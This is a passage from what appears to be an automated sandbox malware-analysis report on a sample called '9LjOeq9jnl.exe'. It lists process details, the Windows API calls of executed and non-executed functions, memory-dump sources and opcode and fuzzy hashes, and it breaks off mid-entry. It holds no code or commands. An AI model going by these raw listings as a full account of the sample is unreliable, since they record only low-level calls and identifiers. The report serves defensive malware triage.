Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 9LjOeq9jnl.exe PID: 244 Parent PID: 5480 9LjOeq9jnl.exeCOMMON

Executed Functions

Function 010ABF68, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 010ABFC8
GetCurrentThread.KERNEL32 ref: 010AC005
GetCurrentProcess.KERNEL32 ref: 010AC042
GetCurrentThreadId.KERNEL32 ref: 010AC09B

Memory Dump Source

Source File: 00000000.00000002.303912305.00000000010A0000.00000040.00000001.sdmp, Offset: 010A0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 887e8f5b5f765bd65375462abc07d9339e7e0c271c85f9089756daff26d1b39f
Instruction ID: 4928502731b3615d84e846ded3e47682829bc359a546475882d4239bad2f8421
Opcode Fuzzy Hash: 887e8f5b5f765bd65375462abc07d9339e7e0c271c85f9089756daff26d1b39f
Instruction Fuzzy Hash: A75132B09006498FEB14CFAAC688BEEBFF4EF49314F24845AE459A7360C7356844CF65

Uniqueness

Uniqueness Score: -1.00%

Function 010A9C70, Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 010A9EB6

Memory Dump Source

Source File: 00000000.00000002.303912305.00000000010A0000.00000040.00000001.sdmp, Offset: 010A0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1dbc6b919eb4ac6e6b970176f9378e9bc21703e6957a1298d7e19ac2e3d40d4e
Instruction ID: 111bbfcddaea512eaaa22b7aaafda9dae90d7c170ad20d46b68dc3665c598cc0
Opcode Fuzzy Hash: 1dbc6b919eb4ac6e6b970176f9378e9bc21703e6957a1298d7e19ac2e3d40d4e
Instruction Fuzzy Hash: 2E713570A00B058FDB64DFAAD44479ABBF5BF88308F40892DD58ADBA50DB34E845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 010A3CAC, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 010A5421

Memory Dump Source

Source File: 00000000.00000002.303912305.00000000010A0000.00000040.00000001.sdmp, Offset: 010A0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 05f82c31c1272382447129ddf0a9d70e0c285d5b59306d9948d2fee7ec0554f7
Instruction ID: fbd1a0dabbaf6de30efc90d46c888f393768e967201bf7464e55720c65e0f481
Opcode Fuzzy Hash: 05f82c31c1272382447129ddf0a9d70e0c285d5b59306d9948d2fee7ec0554f7
Instruction Fuzzy Hash: 1941F0B1D00618CBDB24DFE9C848BCEBBB5BF48308F64846AD418AB250DB756985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 010A5369, Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 010A5421

Memory Dump Source

Source File: 00000000.00000002.303912305.00000000010A0000.00000040.00000001.sdmp, Offset: 010A0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 3ca977c8a3de78281dd15b0d8692854f3deb3ffbf57f235f91364b6bf8e66696
Instruction ID: 690b49b89f312f17e49a3aaf52e6c0319033823bb1aed7fbd9bd56aa43abf405
Opcode Fuzzy Hash: 3ca977c8a3de78281dd15b0d8692854f3deb3ffbf57f235f91364b6bf8e66696
Instruction Fuzzy Hash: 53411171D00618CFDF24DFA9C848BCEBBB5BF49308F64846AD458AB250DB716946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 010AC188, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010AC217

Memory Dump Source

Source File: 00000000.00000002.303912305.00000000010A0000.00000040.00000001.sdmp, Offset: 010A0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bb9673879b12c8083f4f535edfbb62c2492315fcea23ef6b214cacd85a0ba0a1
Instruction ID: ab8f2e2fb19777a89c55b6dc723ee12c20e093720a5d3a83717d1dbb9ea775b7
Opcode Fuzzy Hash: bb9673879b12c8083f4f535edfbb62c2492315fcea23ef6b214cacd85a0ba0a1
Instruction Fuzzy Hash: 2C21D2B5900248AFDB10CFA9D984AEEBFF8FB48324F14851AE954A7350C374A955CF61

Uniqueness

Uniqueness Score: -1.00%

Function 010AC190, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010AC217

Memory Dump Source

Source File: 00000000.00000002.303912305.00000000010A0000.00000040.00000001.sdmp, Offset: 010A0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 63d1ab94c24877144d5487f5e5862b0217bbbc20e74bb0209740dbf50e837cc7
Instruction ID: 3e969a83c7bf78be1ffc082314c51af1d6c1440ded5518f9f864fd3c874346c9
Opcode Fuzzy Hash: 63d1ab94c24877144d5487f5e5862b0217bbbc20e74bb0209740dbf50e837cc7
Instruction Fuzzy Hash: 6621C4B59002489FDB10CFDAD984ADEBFF8FB48324F14841AE954A7350D374A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 010A96C0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010A9F31,00000800,00000000,00000000), ref: 010AA142

Memory Dump Source

Source File: 00000000.00000002.303912305.00000000010A0000.00000040.00000001.sdmp, Offset: 010A0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1730956a2da63760cea5b4da1108936017ff795541b64697cebb8deb3e96d242
Instruction ID: 51cd0208d805c208a93cd9d599608686157928a3689405ba10f91e1b16da6dcf
Opcode Fuzzy Hash: 1730956a2da63760cea5b4da1108936017ff795541b64697cebb8deb3e96d242
Instruction Fuzzy Hash: 131133B2A00248DFCB10CF9AD844ADEBBF8EB48324F04842AE555A7240C374A948CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010AA0D0, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010A9F31,00000800,00000000,00000000), ref: 010AA142

Memory Dump Source

Source File: 00000000.00000002.303912305.00000000010A0000.00000040.00000001.sdmp, Offset: 010A0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 604b8b2019ceca5ce077b6b88a2058047a3dd87ff820c5a21c52e5a94861b5fe
Instruction ID: 9638756027b746134264f2e2e8d11dec2daaaa19f5a370031f513d9be19bdce7
Opcode Fuzzy Hash: 604b8b2019ceca5ce077b6b88a2058047a3dd87ff820c5a21c52e5a94861b5fe
Instruction Fuzzy Hash: B72133B2D00208DFDB10CF9AC844ADEBBF4EB98324F14842AD455A7240C374A949CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 010A9E50, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 010A9EB6

Memory Dump Source

Source File: 00000000.00000002.303912305.00000000010A0000.00000040.00000001.sdmp, Offset: 010A0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: eb52474131a961c36f5e4cd7bb7d3dccab2f0899671f7e8aaa78eccfbf90b48a
Instruction ID: 928ba96ed4c6c81b91009c8904e5fbb9d0d44942489a8b6a38e37f1b19ec0b00
Opcode Fuzzy Hash: eb52474131a961c36f5e4cd7bb7d3dccab2f0899671f7e8aaa78eccfbf90b48a
Instruction Fuzzy Hash: 4F1110B2D006498FDB10CF9AC444BDEFBF4AB88328F54842AD569B7700C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FFD1FC, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.303569712.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 091e41d4585e42e7a9c815750a4711c390ab9183651df27e5058bc8d2c56e030
Instruction ID: 3d9712781d6e225ae309a506c911ed617b5e22ebe1981a3f4ebe652897665054
Opcode Fuzzy Hash: 091e41d4585e42e7a9c815750a4711c390ab9183651df27e5058bc8d2c56e030
Instruction Fuzzy Hash: 38210672504248DFDF05DF54D9C4B3ABB66FF88324F2489A9E9050B266C336D816EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FFD4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.303569712.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8c0574b490c86fa02b11f3f9a21d09b9d98a67b9e08856f633ad7337af55c44
Instruction ID: 019b101cf870c09d3dad99ea3b4614d9587315caeefd3c828ec6fdf5aa60b1e4
Opcode Fuzzy Hash: b8c0574b490c86fa02b11f3f9a21d09b9d98a67b9e08856f633ad7337af55c44
Instruction Fuzzy Hash: DE210672500248DFDF05DF54D9C0B36BB66FF94328F288969D9050B266C336D856EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0101D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.303684669.000000000101D000.00000040.00000001.sdmp, Offset: 0101D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fab6cbccff195e34a0cebb52d604404e96b2b2de7bafc900b2dfa97657dd5183
Instruction ID: 7bd81e08b91b31fedc1b40bd4008c0a995bf6b40022b88aa4b2a3b54e4590044
Opcode Fuzzy Hash: fab6cbccff195e34a0cebb52d604404e96b2b2de7bafc900b2dfa97657dd5183
Instruction Fuzzy Hash: 35210675504200DFDB16DF98D9C8B16BBA5FB44354F20C9A9E8890B34AC33AD447CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00FFD1F7, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.303569712.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 133848dfa26b84daca981d4c4d2bc97141f5f4f1cda23a139e6580e7ce35543d
Instruction ID: 1ef6b196a127aa98ea3c225aecf8e1dc70dc40cb6d03f8ce16fba3aa3a5f24d4
Opcode Fuzzy Hash: 133848dfa26b84daca981d4c4d2bc97141f5f4f1cda23a139e6580e7ce35543d
Instruction Fuzzy Hash: D3218E76804244DFDB06CF50D9C4B56BB62FF84324F2485A9D9040A666C336D45ADBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FFD4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.303569712.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc997c99bd989ad9e342aa38babf37e9ac57049c72bd5d22a9deee1ea805652
Instruction ID: 2a8c95a8cffced7e15d49a709589b92289b93d11d7b2b9b7fd8a7179a01ba233
Opcode Fuzzy Hash: 3dc997c99bd989ad9e342aa38babf37e9ac57049c72bd5d22a9deee1ea805652
Instruction Fuzzy Hash: 1111B176804284CFCB15CF14D9C4B26BF72FF84324F28C6A9D9450B666C336D85ADBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0101D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.303684669.000000000101D000.00000040.00000001.sdmp, Offset: 0101D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e279124291f20297b9b187c3294b06941cdaf3a9b439075604eb1c60eb114b78
Instruction ID: 57b4580ac09a448fc7ae15abfffc2f2534b1da83b5b0e876e297c70359d0fecf
Opcode Fuzzy Hash: e279124291f20297b9b187c3294b06941cdaf3a9b439075604eb1c60eb114b78
Instruction Fuzzy Hash: 5C11BE75504280CFDB12CF58D5C4B15BBA1FB44314F24C6AAE8494B65AC33BD44ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00FFD7D1, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.303569712.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1cf41e28c190ae3c17fec81948f09e9d331179cf1f77117072be4dd3225c8a1
Instruction ID: 112a9f7c3571aeb2673526d28ad65a704963bf9d9b7bb9ab5f114eff04e398d9
Opcode Fuzzy Hash: a1cf41e28c190ae3c17fec81948f09e9d331179cf1f77117072be4dd3225c8a1
Instruction Fuzzy Hash: 1801F772904748AAEB204A65CD847B6BF9CFF413B4F188459EE045E252C3749844E6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00FFD7D0, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.303569712.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d72db5878b125055cfe4e941ebf02784d939894687b6fdef182563c70b329485
Instruction ID: 9a1486f5a4e285d0a57103e78d33f47ca1b907fd6f389db77c233b828f70b34f
Opcode Fuzzy Hash: d72db5878b125055cfe4e941ebf02784d939894687b6fdef182563c70b329485
Instruction Fuzzy Hash: 56F068718047489EE7108E19CDC4762FF98EF41774F58C55EED485F252C3759844DAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 009B35C4, Relevance: 2.8, Instructions: 2844COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.303144018.00000000009B2000.00000002.00020000.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.303135708.00000000009B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.303323047.0000000000A50000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37888a9b16f55e1473ed86721dd3324e3435adbd48b39bcf4c177fd418bda8df
Instruction ID: a22465174bbab6102b0b71ba72256087b6698f3f1ad06c3fb1c5da76f4138d42
Opcode Fuzzy Hash: 37888a9b16f55e1473ed86721dd3324e3435adbd48b39bcf4c177fd418bda8df
Instruction Fuzzy Hash: 5933F2A140E3C25FCB138B785DB52D17FB19E6722471E49CBC4C0CF0A3E6195A6AE726

Uniqueness

Uniqueness Score: -1.00%

Function 010AEA50, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.303912305.00000000010A0000.00000040.00000001.sdmp, Offset: 010A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b398f57b69b7403836711630a6d93db9ce492f1f1d85ab1c796f588c5bcefe3
Instruction ID: 2c1c45106afdffc32ae78101641d77f52670efa9ed6b0f3d96d5fba7b0e639c3
Opcode Fuzzy Hash: 6b398f57b69b7403836711630a6d93db9ce492f1f1d85ab1c796f588c5bcefe3
Instruction Fuzzy Hash: 0D12B5F96117468ED334DF6AEC981893B61F755328F904308D2E11BAD9D7BE214ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 010ACAAC, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.303912305.00000000010A0000.00000040.00000001.sdmp, Offset: 010A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 323e0cb0755b13a3a05120f7f7abe1e0dab9367af7dd06acde27a73d5f972915
Instruction ID: 3fd69993be65eb81b949379c52770bf5f95f381ad0844ebdb57e40ef378d0885
Opcode Fuzzy Hash: 323e0cb0755b13a3a05120f7f7abe1e0dab9367af7dd06acde27a73d5f972915
Instruction Fuzzy Hash: 96A17C32E1021A8FCF15DFB5C9445DEBBF2FF89300B5581AAE945AB261EB31A945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 010AEA40, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.303912305.00000000010A0000.00000040.00000001.sdmp, Offset: 010A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49bbeb1469c9410424a389befde9b7408b8c4908ea42bf7fcf37e105709aba43
Instruction ID: 1069d155b7c12380b36bddee6ee9985a4a8b8f546273228d1b712391bc7df50f
Opcode Fuzzy Hash: 49bbeb1469c9410424a389befde9b7408b8c4908ea42bf7fcf37e105709aba43
Instruction Fuzzy Hash: F6C15CB96117468FD324DF6AEC981897B71FB85328F514308D2A12BAD8D7BE3446CF44

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 9LjOeq9jnl.exe PID: 4348 Parent PID: 244 9LjOeq9jnl.exeCOMMON

Executed Functions

Function 01069430, Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01069676

Memory Dump Source

Source File: 00000002.00000002.341151724.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 968d1ba764d2550d6c709f85b82fe8c2905f81a5e4ee68640ec9085dcda15f2d
Instruction ID: a776423ae9b24d3e5f3f9f5762cca980881f0f02eeae632b472e4ffc2fb6ce89
Opcode Fuzzy Hash: 968d1ba764d2550d6c709f85b82fe8c2905f81a5e4ee68640ec9085dcda15f2d
Instruction Fuzzy Hash: 02712470A00B058FDB64DF6AD54079ABBF9BF88308F00892ED48AD7A50DB35E805CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0106FD8C, Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0106FEAA

Memory Dump Source

Source File: 00000002.00000002.341151724.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 74db39f455a3d5b64323a0d3413762d418d7ecd8993c484ed6cf9c2b6794f650
Instruction ID: 648f2aefed2a6714fee3e9b7ba60ff328dbe567a95b4651c8d2943def716117d
Opcode Fuzzy Hash: 74db39f455a3d5b64323a0d3413762d418d7ecd8993c484ed6cf9c2b6794f650
Instruction Fuzzy Hash: 0451CFB1D002099FDB14CF99D894ADEBFF5BF48314F24852AE818AB211D7759845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0106DE5C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0106FEAA

Memory Dump Source

Source File: 00000002.00000002.341151724.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: fbcf71d16a5fba113774541802142ccf0fd85c1d7d0959fb6a40b44136071b65
Instruction ID: c0a00d184fae982e5e9b5855950fe4d2f1c308e3fab7fc9a3fa56abe72ec60d2
Opcode Fuzzy Hash: fbcf71d16a5fba113774541802142ccf0fd85c1d7d0959fb6a40b44136071b65
Instruction Fuzzy Hash: D051BDB1D003099FDB14CF9AD894ADEBFF5BF88314F24852AE819AB211D775A845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01065365, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01065421

Memory Dump Source

Source File: 00000002.00000002.341151724.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d4bb39dfc10d60fc1d841b74a92c3d586429a0aea6ae7f61e969273f26aa9935
Instruction ID: 25bbe6511bb23a96d196836ecae06f89dc296065646fe0f2ebf9b14dd3f9ad26
Opcode Fuzzy Hash: d4bb39dfc10d60fc1d841b74a92c3d586429a0aea6ae7f61e969273f26aa9935
Instruction Fuzzy Hash: 7A41F2B1D00219CBDF24DFA9C9847CEBBB5BF89308F24846AD408AB251DB756946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01063E2C, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01065421

Memory Dump Source

Source File: 00000002.00000002.341151724.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 039be799b6871e43936f984095b0366088960c0641d1f7d17ba21c97f4ce2960
Instruction ID: 594bc307e1d27486f31319d584f9ec19320413b68824587ccd7101bcd4472c4c
Opcode Fuzzy Hash: 039be799b6871e43936f984095b0366088960c0641d1f7d17ba21c97f4ce2960
Instruction Fuzzy Hash: 3041E271D00618CBDF24DFA9C8447DEBBB9BF49308F2084A9D408AB251DB756946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0106B950, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0106B91E,?,?,?,?,?), ref: 0106B9DF

Memory Dump Source

Source File: 00000002.00000002.341151724.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8326aeee851e7dc08df985e25505d705d898510d0c106b5b3e9c4964b20e8b28
Instruction ID: 438424640163f871b3cc3abc9738c3657e9511983b1c11b744cb5cc1cfd7a85a
Opcode Fuzzy Hash: 8326aeee851e7dc08df985e25505d705d898510d0c106b5b3e9c4964b20e8b28
Instruction Fuzzy Hash: A42114B59002099FDB10DFAAD484ADEFFF8EB49324F14841AE914A3310D378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0106A154, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0106B91E,?,?,?,?,?), ref: 0106B9DF

Memory Dump Source

Source File: 00000002.00000002.341151724.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1f97139b60eb8ddd73eddcb55e4541fa3feec64066ed3ee9aefd9f9f35b2cfc3
Instruction ID: e1543fcb80ac4b58d62305a744b62c8e13ebe6a0cb7b2ec457f0c9eb888dbd2b
Opcode Fuzzy Hash: 1f97139b60eb8ddd73eddcb55e4541fa3feec64066ed3ee9aefd9f9f35b2cfc3
Instruction Fuzzy Hash: BD21E4B59002099FDB10CF9AD884AEEBBF8EB48324F14841AE954B7310D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010687A0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010696F1,00000800,00000000,00000000), ref: 01069902

Memory Dump Source

Source File: 00000002.00000002.341151724.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4e57a08c7b0f3fe6e0a9cbbdc5045b831b2262feddbeefc349e876c113de9a62
Instruction ID: 63afb12992eed2d714dc2af034b00faacca35b5063ffc46632a5df8a877562ab
Opcode Fuzzy Hash: 4e57a08c7b0f3fe6e0a9cbbdc5045b831b2262feddbeefc349e876c113de9a62
Instruction Fuzzy Hash: 691114B2D003099FDB10DF9AC444ADEFBF8EB58314F14842ED555A7600C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01069894, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010696F1,00000800,00000000,00000000), ref: 01069902

Memory Dump Source

Source File: 00000002.00000002.341151724.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3f5dcfb0808bbf81908ea45add378d155d629d883c68be5305871716a35858b7
Instruction ID: 7776f36927aac41d0f15ad83dc6f199f72c5428ec738f07eaece32722f38bff7
Opcode Fuzzy Hash: 3f5dcfb0808bbf81908ea45add378d155d629d883c68be5305871716a35858b7
Instruction Fuzzy Hash: 0C1134B2D002498FDB10DFAAD444ADEFBF8EB48324F14842EE469A7600C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 070C2248, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 070C22AD

Memory Dump Source

Source File: 00000002.00000002.348806550.00000000070C0000.00000040.00000001.sdmp, Offset: 070C0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2d45f328f3c3420a76ae7a218dbfa7d5213f637ff2591cbee30c5e8fad038390
Instruction ID: a599488d1148560b783791f697f51287e4431a3d50d560db16dcfe6eb7556ff7
Opcode Fuzzy Hash: 2d45f328f3c3420a76ae7a218dbfa7d5213f637ff2591cbee30c5e8fad038390
Instruction Fuzzy Hash: 7A11F2B58002499FDB10DF99D884BDEBBF8FB49324F148819D955A7600C375A984CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01069610, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01069676

Memory Dump Source

Source File: 00000002.00000002.341151724.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 553545d815d47c2db9142216ac04de7d0492527f5d889756e13164d0cb2dd6ee
Instruction ID: bd96996479a4679b6ccee7e7c949c46df4ff80a52b097499315f2a2b894e52fd
Opcode Fuzzy Hash: 553545d815d47c2db9142216ac04de7d0492527f5d889756e13164d0cb2dd6ee
Instruction Fuzzy Hash: 481110B1D003498FDB10DF9AC444BDEFBF8AB89328F14852AD469B7610C378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 070C2250, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 070C22AD

Memory Dump Source

Source File: 00000002.00000002.348806550.00000000070C0000.00000040.00000001.sdmp, Offset: 070C0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: f7cdd328a6b04be532cff04f9cf740908b844987cecba4e2b2efa73dc13de1f7
Instruction ID: da1c2515439fef5c8d5960245d297580f75b6d34e9e71c75886039e9cd86d0a7
Opcode Fuzzy Hash: f7cdd328a6b04be532cff04f9cf740908b844987cecba4e2b2efa73dc13de1f7
Instruction Fuzzy Hash: 9911E2B5900349DFDB10DF9AD884BDEBBF8FB48324F14881AE514A7600C375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FCD1FC, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.340954788.0000000000FCD000.00000040.00000001.sdmp, Offset: 00FCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18a0570a5f14a1eda9d497a800bdb02c768d10028c3b7b32fcae776240039545
Instruction ID: 7441994ee8138f321c3ff9f21aff606efdde72f09e2d364f38b98cd9c87df1f8
Opcode Fuzzy Hash: 18a0570a5f14a1eda9d497a800bdb02c768d10028c3b7b32fcae776240039545
Instruction Fuzzy Hash: 4B21D372504241EFDF05DF54DAC5FAABB65FB88324F2489BDE8050B246C336D816EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FCD4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.340954788.0000000000FCD000.00000040.00000001.sdmp, Offset: 00FCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f52846f54fb692190a0d3677c1ff128830aa89c968342b28c51fcd7a1225e729
Instruction ID: aaa1aa1e6a08f31172e1a2a342a4df4ce356ce208c8b1dc8500582fec4c2ac05
Opcode Fuzzy Hash: f52846f54fb692190a0d3677c1ff128830aa89c968342b28c51fcd7a1225e729
Instruction Fuzzy Hash: 92210672900241DFDB05DF54DAC1F2ABB65FB94328F28897DD8050B246C336D856EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FDD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.340980832.0000000000FDD000.00000040.00000001.sdmp, Offset: 00FDD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 867dfa2161f7823a723c097de4b6c6ffd355fa05af6989ad9dcc4d25b760f927
Instruction ID: 60b17678b06cdc46c1537b08b50fe7f6ba65ce17ec18fe9052d75999dc1a4901
